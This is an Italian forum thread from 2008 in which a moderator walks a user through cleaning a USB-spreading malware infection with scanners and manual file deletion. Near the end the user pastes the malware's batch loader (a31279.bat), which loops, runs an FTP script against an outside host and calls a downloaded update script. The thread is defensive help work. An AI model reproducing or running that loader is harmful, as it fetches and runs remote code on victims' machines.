| Autore |
 Discussione  |
|
ruggerino
Senior Member
132 Messaggi |
Inserito il - 13/07/2008 : 16:38:48
|
Intanto ti mando il file sleep.exe
Attento che per caricarlo su savefile ho dovuto cambiare l'estensionein txt se non non lo prendeva.
|
Modificato da - ruggerino in data 13/07/2008 18:50:28 |
 |
|
|
death
Moderatore
Città: Pinerolo e dintorni
7791 Messaggi |
 Inserito il - 13/07/2008 : 16:43:22
|
Buona sera a tutti, mi sono salvato il link, modica il tuo post ed elimina il link per cortesia, non vorrei che lo scaricassero tutti per vedere se funziona  |
|
|
|
ruggerino
Senior Member
132 Messaggi |
Inserito il - 13/07/2008 : 19:14:41
|
Allora Death, ho eseguito alla lettera quanto da te descritto:
Qui c'è il link del log di Avenger htt*://[www].savefile[.com]/files/1664825
e qui quello di Bit Defender htt*://[www].savefile[.com]/files/1664826
Ti voglio avvisare che dopo lo scan con Avenger mi è apparsa una finestra di PREVX-CSI con titolo " System status: Infected". Messaggio "CSI has detected 1 currently active threat in your PC. It is recommended that you use CSI to remove this infection". Poi una finestra con indicazione: "BAD - C:\Windows\installer\24ha12\inet\int2com.exe Malicious Software"
Poi ho avviato il file pippo.bat e qui c'è il link dello scan htt*://[www].savefile[.com]/files/1664846
Poi ho avviato anche pippo1.bat e qui c'è il link dello scan htt*://[www].savefile[.com]/files/1664847
Infine lo scan di cmd.exe con virus total, ecco il link
htt*://[www].savefile[.com]/files/1664864
Spero di aver fatto tutto bene, mi son mangiato un intero pomeriggio.
Grazie. |
|
|
|
death
Moderatore
Città: Pinerolo e dintorni
7791 Messaggi |
Inserito il - 13/07/2008 : 20:42:46
|
Buona sera a tutti, ti sei mangiato il pomeriggio...beh considera che alle 7,45 ti preparavo lo script quindi siamo pari..
Riepilogo una bella pulizia è stata fatta, avevo immaginato che ti avesse infestato anche d:\ e infatti ha trovato il file autorun.inf, il problema è che lo vedo anche in c:\ nel tuo user insieme ad un file ini, ora ti faccio lavorare di nuovo:
Per prima cosa, da start>esegui digita regedit, ti si aprirà l'editor del registro di windows, da file seleziona esporta e salva una copia del registro in una cartella apposita, creala in c:\, tipo c:\copia_registro
Cercami con la funzione trova il file sleep non mettere estensioni dovrebbe trovarli tutti, se non funziona fai la ricerca con sleep.???
poi postami i percorsi
Riavvia il pc in modalità provvisoria, inserisci la pen drive sempre con il tasto shift premuto poi da start>esegui digita cmd
ti si aprirà con la riga c:\documents and setting..... digita cd\
la riga dovrebbe apparirti come c:\
digita del h:\hvNrtID.exe poi dai invio
digita del h:\Autorun.inf poi dai invio
fatto questo chiudi l'utility cmd con la x in alto, rimuovi la pen drive e riavvia il pc
poi
1) rifai una scansione on line con kaspersky con la pen drive inserita (sempre tasto shift premuto quando la inserisci) e posta il report
2) Scarica questo programma:
Per scaricare Malwarebytes Malwarebytes
1) lo installi
2) lo aggiorni - disconneti e chiudi tutti i programmi
3) fai una scansione scegliendo la modalità completa
4) NON eliminare le eventuali minacce che rileva
5) finita la scansione seleziona il tabellino log, apri il file di testo e postalo sul forum come gli altri report
3) scarica Systemscan Systemscan
1) disconnetti il pc da internet
2) disattiva l'antivirus
3) esegui systemscan
4) clicca su "Scan Now"
Il programma ti rilascerà un file di report, postamelo come gli altri
Nota la scansione con system scan puo' risultare lunga, se per caso si interrompe posta il rapporto parziale, poi rilancia la scansione togliendo il segno di spunta all'inizio sulla ricerca in cui si è bloccato e riavvialo.
Controlla nella cartella c:\windows\prefetch se ritrovi dei file facenti riferimento a quelli eliminati con avenger.
Portati nella cartella c:\windows\system32 cerca il file cmd.exe cliccaci sopra con il destro e prendi nota delle proprietà tipo produttore, versione, anno ecc ecc.
Se puoi evita di connetterti, questo virus è praticamente sconosciuto e i files nuovi che crea escono giorno dopo giorno, il tuo files sleep.exe è stato inviato e domani sarà sottoposto a controllo.
In ogni caso vediamo se ha la testa piu' dura il virus o il sottoscritto  , se devo soccombere almeno lo faccio con onore
[ot] un ringraziamento di cuore alla principessa che mi ha corretto lo script di avenger e mi ha passato il file pippo.txt [ot]
|
Modificato da - death in data 13/07/2008 20:56:06 |
|
|
|
ruggerino
Senior Member
132 Messaggi |
Inserito il - 14/07/2008 : 18:09:29
|
Non riesco a entrare in modalità provvisoria.
Mi spiego:
nel mio PC portatile ho il riconoscimento dell'impronta e a forza di usarlo mi son dimenticato la pwd.
Ma in modalità provvisoria devo entrare come Administrator?
Posso eventualmente riazzerare e rimettere una nuova pwd una volta entrato con l'impronta ?
Se no, non so come fare. |
|
|
|
death
Moderatore
Città: Pinerolo e dintorni
7791 Messaggi |
Inserito il - 14/07/2008 : 21:04:31
|
| Buona sera a tutti, evitiamo la provvisoria per ora, fai tutto il resto, in ogni caso per entrare in provvisoria, entri come administrator ma se non hai la password la vedo dura, bisogna modificare i privilegi da amministratore in modalità normale. |
|
|
|
ruggerino
Senior Member
132 Messaggi |
Inserito il - 15/07/2008 : 18:55:27
|
Allora Death, riepilogando:
ho ritrovato la pwd per l'accesso Admin in provvisoria.
Credo che la pulizia fatta abbia dato i suoi frutti.
Intanto il file sleep non lo trovo più.
Poi nonostante in modalità provvisoria, mi dice che non ci sono su H: i file hvNrtID.exe e autorun.inf.
Ciò non è vero perchè poi entrando in modalità normale (sempre premendo Shift per la Pen) li vedo entrambi su H:.
Allora ho fatto così semplicemente:
ho tolto da H: i file che mi interessano ed ho formattato la Pen.
Ho rifatto Kaspersky e non mi da nulla, quindi non so se tu dici di fare qualcos'altro, o se fare comunque Malwarebytes e SystemScan.
Se non altro quelle fastidiose finestre non compaiono più, ma adesso il problema è trovare un antivirus che eviti il ri-contagio.
Attualmente ho NOD32 aggiornato giorno giorno.
Tu che mi dici?
|
|
|
|
death
Moderatore
Città: Pinerolo e dintorni
7791 Messaggi |
Inserito il - 15/07/2008 : 21:15:50
|
Buona sera a tutti, una bella notizia, mi serviva questa sera, fai le scansioni che ti avevo prescritto e postami comunque il log di system scan, io sto aspettando i risultati dell'analisi di sleep.exe, la soluzione sulla pen drive...drastica ma efficace.
Vorrei finire tutte le scansioni con te per essere certo di non ritrovarti qui tra 2 giorni con il pc al punto di prima, te l'ho detto è un virus recente e stranamente polimorfico, non voglio lasciarti rimasugli se possibile.
Mi raccomando per le scansioni segui alla lettera quello che ti avevo postato. |
|
|
|
ruggerino
Senior Member
132 Messaggi |
Inserito il - 18/07/2008 : 17:48:42
|
Scusa Death per il ritardo, ma sono stato fuori per lavoro.
Ho continuato la procedura che mi avevi dato.
Ti mando il log dello scan di Malwarebytes htt*://[www].savefile[.com]/files/1674725
e il log dello scan con SystemScan htt*://[www].savefile[.com]/files/1674726
Di Kaspersky ti avevo già detto. Il file sleep non lo trovo.
Su PREFECT non trovo i file riferimento a quelli eleiminati con Avenger.
Le notizie su cmd.exe Produttore: Microsoft Corporation, Versione: 5.1.2600.2180, Data Creazione 30.08.2005, Dimensioni 388Kb
Spero di non aver dimenticato nulla.
Grazie di nuovo. |
|
|
|
death
Moderatore
Città: Pinerolo e dintorni
7791 Messaggi |
Inserito il - 18/07/2008 : 22:03:04
|
Buona sera a tutti, rifai la scansione con malewarebytes e poi fai "rimuovi" inoltre ti lascio delle cose da cercare, ti modifichero' il post mano a mano che trovo qualcosa, lancia il blocco note e apri questo file c:\2913790.txt e vedine il contenuto, se non è lungo incollalo qui.
Poi vai su questo sito htt*://[www].virustotal[.com]/it/ con sfoglia cerca questo file C:\DOCUME~1\2913790\IMPOST~1\Temp\a31279.bat clicca su invia file poi attendi il report, salvalo e postalo come gli altri report. |
Modificato da - death in data 18/07/2008 22:20:11 |
|
|
|
ruggerino
Senior Member
132 Messaggi |
Inserito il - 19/07/2008 : 09:55:33
|
Ecco il file c:\2913790.txt
htt*://[www].savefile[.com]/files/1676009
ed ecco lo scan con Virus Total di a31279.bat
htt*://[www].savefile[.com]/files/1676010
Alla prossima. |
|
|
|
Sibilla
Advanced Member
2059 Messaggi |
Inserito il - 19/07/2008 : 10:30:41
|
apri un file di testo qualsiasi
clicca su "file", "apri"
=> apri il file C:\DOCUME~1\2913790\IMPOST~1\Temp\a31279.bat
salvalo come pippo.txt
cosa contiene il file?
nota: se clicchi 2 volte sul file bat lo esegui.. quindi non farlo |
|
|
|
ruggerino
Senior Member
132 Messaggi |
Inserito il - 19/07/2008 : 11:04:10
|
Mando lo scan con rimuovi fatto con Malwarebytes
htt*://[www].savefile[.com]/files/1676056
Questo è il contenuto di a31279.bat come richiesto da sibilla:
[No-Spam]shift
:begin
set winH=%systemroot%\Installer\24ha12
if exist %winH%\inet\stp exit
if exist %winH%\inet\intupdate\intupdate.bat del /b %winH%\inet\intupdate\intupdate.bat
ftp -v -i -s:"%winH%\inet\int2com.txt" ftp.digiland.it
if not exist %winH%\inet\slp2.exe copy %myfiles%\sleep.exe, %winH%\inet\slp2.exe
start /b /wait %winH%\inet\slp2.exe 900
if exist %winH%\inet\intupdate\intupdate.bat call %winH%\inet\intupdate\intupdate.bat
goto begin
|
|
|
|
Sibilla
Advanced Member
2059 Messaggi |
Inserito il - 19/07/2008 : 11:10:00
|
direi di eliminarli tutti al volo
ciao... |
|
|
|
death
Moderatore
Città: Pinerolo e dintorni
7791 Messaggi |
Inserito il - 19/07/2008 : 11:12:13
|
|
Buon giorno a tutti, dammi tempo che ti preparo lo script per rimuoverli tutti, ci aggiorniamo nel pomeriggio. |
|
|
|
Discussione |
|
Probabile virus "Disco non presente"
Forum Bloccato
